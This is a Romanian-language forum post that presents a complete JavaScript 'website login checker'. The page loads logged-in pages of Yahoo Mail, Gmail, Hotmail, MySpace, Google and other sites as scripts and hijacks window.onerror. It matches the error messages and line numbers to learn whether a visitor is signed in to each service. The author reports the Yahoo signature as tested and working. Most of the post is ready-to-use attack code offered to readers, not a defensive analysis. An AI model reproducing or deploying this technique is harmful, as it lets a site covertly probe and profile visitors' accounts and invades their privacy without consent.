Jump to content
michee

JS Website Login Checker

Recommended Posts

Cum am zis ieri, azi vine partea a2a.....Creditz tot ptr autorii XSS Attacks 2007....

Principiul de functionare e urmatorul: Se face o cerere catre o pagina din contul unui website de genul <script src="mail.yahoo.com"></script>

Daca userul este logat in cont vom obtine o eroare js (ptr ca acea pagina e o pagina html de fapt nu e o pagina de cod js) la o anumita linie si cu o anumita descriere (sa zicem syntax error). Daca Userul nu e logat vom obtine eroare la alta linie (mai mult ca sigur zic eu --) si cu o alta descriere(sau chiar aceeeasi descriere).

Deci luandu-ne dupa nr de linie la care s-a obtinut eroarea si descrierea erorii putem sa ne dam seama daca userul e logat sau nu. Dar cum vedem noi nr de linie si descrierea? Facand hijack la functia window.onerror

care are ca parametri descrierea erorri, url-ul unde s-a obtinut eroarea si nr de linie.

Exemplul ptr Yahoo merge sigur, am modificat eu variabilele din exemplul de mai jos. Probabil celelalte site-uri au mai suferit modificari in pagina in caz de login/ logout si va trebui sa modificati putin variabilele.


<html>
<head>
<title>JavaScript WebSite Login Checker</title>
<script>
<!--
/* inlocuim functia onerror cu functia noastra */
window.onerror = err;
/* Acestea sunt niste numere de linii si descriere de erori la cateva site-uri in caz de login/logout . Yahoo merge sigur probabil celelalte vor trebui modificate unelel din ele, Yahoo a fost testat de mine pe data de 19/11/2007 si a mers*/

var sites = {
'http://mail.yahoo.com/' : {
'name' : 'Yahoo Mail (Beta)',
'login_msg' : 'syntax error',
'login_line' : '16',
'logout_msg' : 'syntax error',
'logout_line' : '7',
},
'http://mail.google.com/mail/' : {
'name' : 'Gmail',
'login_msg' : 'XML tag name mismatch',
'login_line' : '8',
'logout_msg' : 'invalid XML attribute value',
'logout_line' : '3',
},
'http://profileedit.myspace.com/index.cfm?fuseaction=profile.interests' : {
'name' : 'MySpace',
'login_msg' : 'missing } in XML expression',
'login_line' : '21',
'logout_msg' : 'syntax error',
'logout_line' : '82',
},
'http://beta.blogger.com/adsense-preview.g?blogID=13756280' : {
'name' : 'Blogger (Beta)',
'login_msg' : 'XML tag name mismatch',
'login_line' : '8',
'logout_msg' : 'syntax error',
'logout_line' : '1',
},
'http://www.flickr.com/account' : {
'name' : 'Flickr',
'login_msg' : 'syntax error',
'login_line' : '1',
'logout_msg' : 'syntax error',
'logout_line' : '7',
},
'http://www.hotmail.com/' : {
'name' : 'Hotmail',
'login_msg' : 'missing } in XML expression',
'login_line' : '1',
'logout_msg' : 'syntax error',
'logout_line' : '3',
},
'http://my.msn.com/' : {
'name' : 'My MSN',
'login_msg' : 'missing } in XML expression',
'login_line' : '1',
'logout_msg' : 'syntax error',
'logout_line' : '3',
},
'http://searchappsecurity.techtarget.com/login/' : {
'name' : 'SearchAppSecurity Techtarget',
'login_msg' : 'syntax error',
'login_line' : '16',
'logout_msg' : 'syntax error',
'logout_line' : '3',
},
'https://www.google.com/accounts/ManageAccount' : {
'name' : 'Google',
'login_msg' : 'XML tag name mismatch',
'login_line' : '91',
'logout_msg' : 'missing = in XML attribute',
'logout_line' : '35',
}
};
/* Creem un tabel dinamic ptr fiecare site in parte*/
function addRow(loc) {
var table = document.getElementById('results');
var tr = document.createElement('tr');
table.appendChild(tr);
var td1 = document.createElement('td');
td1.innerHTML = sites[loc].name;
tr.appendChild(td1);
var td2 = document.createElement('td');
td2.width = 200;
td2.setAttribute('id', sites[loc].name);
td2.innerHTML = '';
tr.appendChild(td2);
var td3 = document.createElement('td');
tr.appendChild(td3);
var button = document.createElement('input');
button.type = "button";
button.value = "Check";
button.setAttribute("OnClick", 'check("' + loc + '");');
td3.appendChild(button);
}
/* Creea un request Catre link-urile de mai sus care vor genera erorile de analizat */
function check(loc) {
var script = document.createElement('script');
script.setAttribute('src', loc);
document.body.appendChild(script);
}
/* handlerul de erori care va decide daca userul e logat sau nu.*/
function err(msg, loc, line) {
/* results block */
var res = document.getElementById(sites[loc].name);
/* check to see if the current test URL matches the signature error message
and line number */
if ((msg == sites[loc].login_msg) && (line == sites[loc].login_line)) {
res.innerHTML = "Logged-in";
} else if ((msg == sites[loc].logout_msg) && (line ==
sites[loc].logout_line)) {
res.innerHTML = "Not Logged-in";
} else {
res.innerHTML = "Not Logged-in";
}
window.stop();
} // end err subroutine
// -->
</script>
</head>
<body>
<div align="center">
<h1>JavaScript WebSite Login Checker</h1>
<table id="results" border="1" cellpadding="3" cellspacing="0"></table>
<script>
for (var i in sites) {
addRow(i);
}
</script>
</div>
</body>
</html>

Astept intrebari, poate n-am fost nestul de clar in explicatii, sunt cam rupt de oboseala cand am scris asta.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...